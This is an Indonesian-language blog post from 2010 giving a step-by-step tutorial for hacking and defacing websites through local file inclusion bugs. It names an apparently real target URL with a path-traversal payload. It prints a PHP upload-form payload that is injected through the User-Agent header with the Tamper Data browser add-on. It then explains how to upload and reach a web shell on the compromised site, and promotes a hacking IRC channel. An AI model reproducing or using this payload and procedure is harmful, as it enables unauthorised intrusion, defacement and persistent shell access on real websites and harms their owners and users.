LFI with tamper data - Code Nubitol
Headlines News :
Home » » LFI with tamper data

LFI with tamper data

Written By Singai on Rabu, 11 Agustus 2010 | 12.47

LFI with tamper data
sekedar berbagi pengetahuan,buat yang belum tau aja ,klo yang udah master pasti dah tau trick ini
bagai mana cara melakukan hacking/deface atau sejenisnya terhadap sebuah website yang mempunyai bugs LFI
owkeh,langkah pertama yaitu cari target
anda bisa memanfaatkan bugs lfi yang banyak bertebaran di google
atau juga menggunakan tools,scanner :D
ok.....anggap saja kita sudah menemukan target
yang vuln,hasil scan kita di mirc
tamper data sudah di instal, klo belom,instal dulu
https://addons.mozilla.org/en-US/firefox/addon/966/
oh iaa promosi juga neh
jgn lupa gabung di channel irc.byroe.net #makzcyber
contoh target yang kita temukan yaitu
http://old[dot]diendandulich[dot]com/diendan//index.php?option=com_g2bridge&controller=../../../../../../../../%00
buka mozilla dan temper data anda
tools->tamper data
klik star tamper
lalu load broser yang tadi
maka akan muncul command
dan klik tamper

pada kolom user agent masukkan script berikut :

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

lalu tekan OK,apabila script berhasil di injeksikan kedalam web tersebut maka akan muncul tampilan form upload,
nah pada sesion inilah anda dapat melakukan uploading shell :D
lalu oplod shell anda,maka akan muncul kembali form tamper data tersebut,masukkan kembali script di atas,apa bila shell berhasil ter upload kedalam web
tersebut,maka akan muncul tulisan UPLOAD SUKSES :D
sekarang shell anda berhasil di injeksikan ke dalam web tersebut,untuk mengaksesnya
anda tinggal mengetikkan di browser anda

http://www/target.com/nama shell.php
lalu setetlah itu terserah anda,
sekian dulu triknya,sekedar share pengetahuan yang saya punya

untuk videonya :
http://vchaters.com/flash/56.swf
thanks buat :touya,gameover,hitamputih,hylalnetheroes,pangeran hakisha,zifoe and makassarhacker.com
Share this article :
Diposting oleh Singai di 12.47

0 komentar:

Speak up your mind

Tell us what you're thinking... !

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Code Nubitol - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger